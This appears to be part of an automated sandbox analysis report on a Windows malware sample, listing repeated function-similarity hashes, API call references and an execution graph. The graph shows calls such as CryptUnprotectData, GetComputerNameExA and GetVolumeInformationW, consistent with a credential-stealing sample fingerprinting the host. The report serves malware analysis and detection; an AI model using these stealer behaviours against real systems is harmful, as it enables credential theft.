                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSectionValuestrcpy$EnterLeavecalloc
                                                                            • String ID: @Jcd
                                                                            • API String ID: 53972724-3276935698
                                                                            • Opcode ID: 894d9e19391c7671d5045d8304978958721384f8ea430e3b6d567a1afbd35767
                                                                            • Instruction ID: 7fd2984509a053d55db608ef4d1ab515e20b84781e8ed9c487876e98fe24c1c5
                                                                            • Opcode Fuzzy Hash: 894d9e19391c7671d5045d8304978958721384f8ea430e3b6d567a1afbd35767
                                                                            • Instruction Fuzzy Hash: B40171B19093508BE712AF69C64025DBBE0FF66B45F01992ED1C89B700D775C8C1DB5B
                                                                            APIs
                                                                            • strcpy.MSVCRT ref: 64602FFC
                                                                            • strcpy.MSVCRT ref: 64603079
                                                                              • Part of subcall function 6460AD78: TlsGetValue.KERNEL32(?,?,?,?,64601855), ref: 6460ADAA
                                                                            • calloc.MSVCRT ref: 64603030
                                                                              • Part of subcall function 6460ADB6: TlsSetValue.KERNEL32(?,?,?,?,?,64603047), ref: 6460ADEF
                                                                              • Part of subcall function 6460AE74: EnterCriticalSection.KERNEL32(?,?,?,?,?,64603053), ref: 6460AEA6
                                                                              • Part of subcall function 6460AEB2: LeaveCriticalSection.KERNEL32(?,?,?,?,?,6460306C), ref: 6460AEE4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSectionValuestrcpy$EnterLeavecalloc
                                                                            • String ID: @Jcd
                                                                            • API String ID: 53972724-3276935698
                                                                            • Opcode ID: 92b6e789aec27669b293b6c0be98687b4830d1ed129aaa0fc392377fbff5ffeb
                                                                            • Instruction ID: 7fd2984509a053d55db608ef4d1ab515e20b84781e8ed9c487876e98fe24c1c5
                                                                            • Opcode Fuzzy Hash: 92b6e789aec27669b293b6c0be98687b4830d1ed129aaa0fc392377fbff5ffeb
                                                                            • Instruction Fuzzy Hash: B40171B19093508BE712AF69C64025DBBE0FF66B45F01992ED1C89B700D775C8C1DB5B
                                                                            APIs
                                                                            • strcpy.MSVCRT ref: 64602FFC
                                                                            • strcpy.MSVCRT ref: 64603079
                                                                              • Part of subcall function 6460AD78: TlsGetValue.KERNEL32(?,?,?,?,64601855), ref: 6460ADAA
                                                                            • calloc.MSVCRT ref: 64603030
                                                                              • Part of subcall function 6460ADB6: TlsSetValue.KERNEL32(?,?,?,?,?,64603047), ref: 6460ADEF
                                                                              • Part of subcall function 6460AE74: EnterCriticalSection.KERNEL32(?,?,?,?,?,64603053), ref: 6460AEA6
                                                                              • Part of subcall function 6460AEB2: LeaveCriticalSection.KERNEL32(?,?,?,?,?,6460306C), ref: 6460AEE4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSectionValuestrcpy$EnterLeavecalloc
                                                                            • String ID: @Jcd
                                                                            • API String ID: 53972724-3276935698
                                                                            • Opcode ID: 9111fecaa2ca1a20a779fccf97fb1b66005629668a3d45a597bb29a7d75a2d6f
                                                                            • Instruction ID: 7fd2984509a053d55db608ef4d1ab515e20b84781e8ed9c487876e98fe24c1c5
                                                                            • Opcode Fuzzy Hash: 9111fecaa2ca1a20a779fccf97fb1b66005629668a3d45a597bb29a7d75a2d6f
                                                                            • Instruction Fuzzy Hash: B40171B19093508BE712AF69C64025DBBE0FF66B45F01992ED1C89B700D775C8C1DB5B
                                                                            APIs
                                                                            • strcpy.MSVCRT ref: 64602FFC
                                                                            • strcpy.MSVCRT ref: 64603079
                                                                              • Part of subcall function 6460AD78: TlsGetValue.KERNEL32(?,?,?,?,64601855), ref: 6460ADAA
                                                                            • calloc.MSVCRT ref: 64603030
                                                                              • Part of subcall function 6460ADB6: TlsSetValue.KERNEL32(?,?,?,?,?,64603047), ref: 6460ADEF
                                                                              • Part of subcall function 6460AE74: EnterCriticalSection.KERNEL32(?,?,?,?,?,64603053), ref: 6460AEA6
                                                                              • Part of subcall function 6460AEB2: LeaveCriticalSection.KERNEL32(?,?,?,?,?,6460306C), ref: 6460AEE4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSectionValuestrcpy$EnterLeavecalloc
                                                                            • String ID: @Jcd
                                                                            • API String ID: 53972724-3276935698
                                                                            • Opcode ID: f771907b61be5a3dcdbd550293ad18c99fb24c9d8b1d696943ad1ab3ce83aa04
                                                                            • Instruction ID: 7fd2984509a053d55db608ef4d1ab515e20b84781e8ed9c487876e98fe24c1c5
                                                                            • Opcode Fuzzy Hash: f771907b61be5a3dcdbd550293ad18c99fb24c9d8b1d696943ad1ab3ce83aa04
                                                                            • Instruction Fuzzy Hash: B40171B19093508BE712AF69C64025DBBE0FF66B45F01992ED1C89B700D775C8C1DB5B
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: Client$Screen$ClipCursorRect
                                                                            • String ID:
                                                                            • API String ID: 327882252-0
                                                                            • Opcode ID: 162a1efc762c65cbf26b615fccb4085475b686e5eaa3f8dd21bba7fef1701905
                                                                            • Instruction ID: de3967afa0118325527a500990337cf9830fa330cb0f33882166e8e8a5f9da13
                                                                            • Opcode Fuzzy Hash: 162a1efc762c65cbf26b615fccb4085475b686e5eaa3f8dd21bba7fef1701905
                                                                            • Instruction Fuzzy Hash: 7401C7B5508314DFDB10AFA9D98899ABBFCEF8D711F05846DF988D7206D770A440CB61
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: sprintfstrcmpstrncpy
                                                                            • String ID:
                                                                            • API String ID: 3428612647-3916222277
                                                                            • Opcode ID: 6f6045445ff9401ca04718910da4c7baab9fa4e349a2653e0bbe6209c7db91f3
                                                                            • Instruction ID: 027aeb0801abcbd9981f36cb3dfc2850e8ec7fcfbd5dac22fc52f1f3b90d426a
                                                                            • Opcode Fuzzy Hash: 6f6045445ff9401ca04718910da4c7baab9fa4e349a2653e0bbe6209c7db91f3
                                                                            • Instruction Fuzzy Hash: 81F0D4B0809318ABD701EF65D5815DEFFF8EF58694F40881EE89897301E735D5448B97
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiVirtualWide
                                                                            • String ID: 6ad
                                                                            • API String ID: 3828976821-1031825395
                                                                            • Opcode ID: 8383c1e8cf737a5170c7d91abc13bcbd3d938c45e0974207f741a0ee60a6cb8d
                                                                            • Instruction ID: 24419a969d7d0daed1f4e42002e395fe619d61d3fe672e14837b8803912eadce
                                                                            • Opcode Fuzzy Hash: 8383c1e8cf737a5170c7d91abc13bcbd3d938c45e0974207f741a0ee60a6cb8d
                                                                            • Instruction Fuzzy Hash: 5D3148709087199FDB14DF19C94439AFBF4FF89714F00899DE4889B350D7769A898F82
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: InfoMonitorWindow
                                                                            • String ID: (
                                                                            • API String ID: 1000336858-3887548279
                                                                            • Opcode ID: a9dc9575a43f2710632ea7e14083647647f16b44805017f0800d4cc3a24ca00e
                                                                            • Instruction ID: 502e0767f41d8d433dddf24bc5cde6cf11d2560b46fb9b82cde7352b0b0e82d5
                                                                            • Opcode Fuzzy Hash: a9dc9575a43f2710632ea7e14083647647f16b44805017f0800d4cc3a24ca00e
                                                                            • Instruction Fuzzy Hash: 1501A975A08305DFCB04DFADD58899EBBF5FB88310F008929E958E7351E77499448F92
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: InfoMonitorwcscmp
                                                                            • String ID: h
                                                                            • API String ID: 2112724651-2439710439
                                                                            • Opcode ID: 21d257595f40e48e7631c37dcd568436e83cb1d361751ab2fd3c41ed39c1d526
                                                                            • Instruction ID: f03be016e800082238e742283fde96a3313a8a764e9bcebccff95e88b6ecb0fc
                                                                            • Opcode Fuzzy Hash: 21d257595f40e48e7631c37dcd568436e83cb1d361751ab2fd3c41ed39c1d526
                                                                            • Instruction Fuzzy Hash: E4F044719042099BDB10DF99DD80ADEBBF8FF88754F00842AE994D7341D735D9149BA1
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,6460C5CF), ref: 646083C2
                                                                            • calloc.MSVCRT ref: 646083EE
                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6460841B
                                                                            • free.MSVCRT ref: 6460843B
                                                                              • Part of subcall function 64608298: GetLastError.KERNEL32 ref: 646082DF
                                                                              • Part of subcall function 64608298: FormatMessageW.KERNEL32 ref: 64608317
                                                                              • Part of subcall function 64608298: WideCharToMultiByte.KERNEL32 ref: 64608357
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$ErrorFormatLastMessagecallocfree
                                                                            • String ID:
                                                                            • API String ID: 1537213191-0
                                                                            • Opcode ID: d0d1b7259468c9eb3ef3627c52cb7e652abdd9263ed0db7c84578f0dd1257ab1
                                                                            • Instruction ID: 3fad4399fbb3fd9b921955e3d7d79b08c776be0bad752d566589edefa5aa6e19
                                                                            • Opcode Fuzzy Hash: d0d1b7259468c9eb3ef3627c52cb7e652abdd9263ed0db7c84578f0dd1257ab1
                                                                            • Instruction Fuzzy Hash: 7B11DAB05093019FD750EF69C68534EBFF4EF85768F009A2EE8D88B290D3B499448B93
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                            • String ID:
                                                                            • API String ID: 682475483-0
                                                                            • Opcode ID: 692ab75c648c49dbaa32af2f6e0461e8d7d7f701c28018ed7cea0e5124da7ae0
                                                                            • Instruction ID: ee5cbb80369ca3e531f180af7fda5c4d324b963a5661de7ff54391a54ec4a6e4
                                                                            • Opcode Fuzzy Hash: 692ab75c648c49dbaa32af2f6e0461e8d7d7f701c28018ed7cea0e5124da7ae0
                                                                            • Instruction Fuzzy Hash: B9F0FFB2908290CBDF11BFBEC88490A7BB4EA62348F015078DD4887204E630E918CBA3
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: free
                                                                            • String ID:
                                                                            • API String ID: 1294909896-0
                                                                            • Opcode ID: 8d5a8716e24c012280490af13f37645d92314cb5b32e981a8aeed7d70d494b59
                                                                            • Instruction ID: b6f1c58577b93784980e3ecbb57c81fa0641531103505bd7ed912e0c9460b5dc
                                                                            • Opcode Fuzzy Hash: 8d5a8716e24c012280490af13f37645d92314cb5b32e981a8aeed7d70d494b59
                                                                            • Instruction Fuzzy Hash: 21E01274A096049BEB00BF7DD4C485BBFE4EF58254F01486AED848F305DB35D8519BE6

                                                                            Execution Graph

                                                                            Execution Coverage:9.4%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:38.5%
                                                                            Total number of Nodes:122
                                                                            Total number of Limit Nodes:4
                                                                            execution_graph 12169 528fd0 12172 528fdc 12169->12172 12170 5291f7 ExitProcess 12171 5291ed 12171->12170 12172->12170 12172->12171 12174 52d090 CoInitializeEx 12172->12174 12175 53b250 12176 53b264 12175->12176 12178 53b33c 12175->12178 12179 53b390 12176->12179 12180 53b3a0 12179->12180 12180->12180 12183 55bde0 12180->12183 12182 53b48f 12184 55be00 12183->12184 12186 55bf1e 12184->12186 12187 558160 LdrInitializeThunk 12184->12187 12186->12182 12187->12186 12188 555392 RtlFreeHeap 12189 546318 12190 546324 12189->12190 12191 54644e 12190->12191 12193 558160 LdrInitializeThunk 12190->12193 12193->12191 12194 545dd8 12195 545de3 12194->12195 12196 545f65 GetPhysicallyInstalledSystemMemory 12195->12196 12197 545f89 12196->12197 12198 53039d 12201 5303c0 12198->12201 12200 52e5b8 12201->12200 12202 533cc0 12201->12202 12203 533d70 12202->12203 12206 55bc40 12203->12206 12205 533ef9 12207 55bc60 12206->12207 12208 55bd8e 12207->12208 12210 558160 LdrInitializeThunk 12207->12210 12208->12205 12210->12208 12211 52d0c3 CoInitializeSecurity 12212 52d100 12213 52d130 12212->12213 12216 552ac0 12213->12216 12215 52d173 12217 552b20 12216->12217 12218 552c21 SysAllocString 12217->12218 12223 552c7e 12217->12223 12220 552c4f 12218->12220 12219 553121 GetVolumeInformationW 12222 55313c 12219->12222 12221 552c5e CoSetProxyBlanket 12220->12221 12220->12223 12221->12223 12222->12215 12223->12219 12224 55c040 12225 55c070 12224->12225 12228 55c0be 12225->12228 12230 558160 LdrInitializeThunk 12225->12230 12227 55c15e 12228->12227 12231 558160 LdrInitializeThunk 12228->12231 12230->12228 12231->12227 12232 552880 12233 5528b0 12232->12233 12235 55293e 12233->12235 12241 558160 LdrInitializeThunk 12233->12241 12236 5529e0 12235->12236 12237 5529de 12235->12237 12240 558160 LdrInitializeThunk 12235->12240 12237->12236 12242 558160 LdrInitializeThunk 12237->12242 12240->12237 12241->12235 12242->12236 12243 558102 RtlReAllocateHeap 12244 558124 12243->12244 12245 54954c CoSetProxyBlanket 12246 558acd 12248 558af0 12246->12248 12247 558b32 12248->12247 12250 558160 LdrInitializeThunk 12248->12250 12250->12247 12251 545709 12252 545728 12251->12252 12253 54585a GetComputerNameExA 12252->12253 12255 5458b0 12253->12255 12254 54593b GetComputerNameExA 12256 545990 12254->12256 12255->12254 12255->12255 12262 53453c 12264 534540 12262->12264 12263 5346bd CryptUnprotectData 12264->12263 12265 558827 12266 558831 12265->12266 12268 5588de 12266->12268 12271 558160 LdrInitializeThunk 12266->12271 12270 558160 LdrInitializeThunk 12268->12270 12270->12268 12271->12268 12273 53bae0 12274 55bc40 LdrInitializeThunk 12273->12274 12275 53bb23 12274->12275 12277 53c3ab 12275->12277 12280 53bc14 12275->12280 12282 558160 LdrInitializeThunk 12275->12282 12278 53c2e8 12278->12277 12284 558160 LdrInitializeThunk 12278->12284 12280->12278 12283 558160 LdrInitializeThunk 12280->12283 12282->12275 12283->12280 12284->12278 12285 55c420 12286 55c440 12285->12286 12288 55c48e 12286->12288 12291 558160 LdrInitializeThunk 12286->12291 12290 55c5af 12288->12290 12292 558160 LdrInitializeThunk 12288->12292 12290->12290 12291->12288 12292->12290 12301 5552e2 RtlAllocateHeap 12302 52d768 12303 52d790 12302->12303 12316 53d8b0 12303->12316 12305 52d8d0 12306 53e070 LdrInitializeThunk 12305->12306 12307 52d8f0 12306->12307 12308 53e2e0 LdrInitializeThunk 12307->12308 12309 52d910 12308->12309 12310 5406e0 LdrInitializeThunk 12309->12310 12311 52d939 12310->12311 12312 540a00 LdrInitializeThunk 12311->12312 12313 52d942 12312->12313 12314 5430b0 LdrInitializeThunk 12313->12314 12315 52d94b 12314->12315 12317 53d910 12316->12317 12317->12317 12318 55bde0 LdrInitializeThunk 12317->12318 12319 53da91 12318->12319 12320 5349a8 12321 5349af 12320->12321 12321->12321 12322 55bde0 LdrInitializeThunk 12321->12322 12323 534ad2 12322->12323 12324 52d9ae 12325 52d9b4 12324->12325 12326 52d9c3 CoUninitialize 12325->12326 12327 52d9f0 12326->12327

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
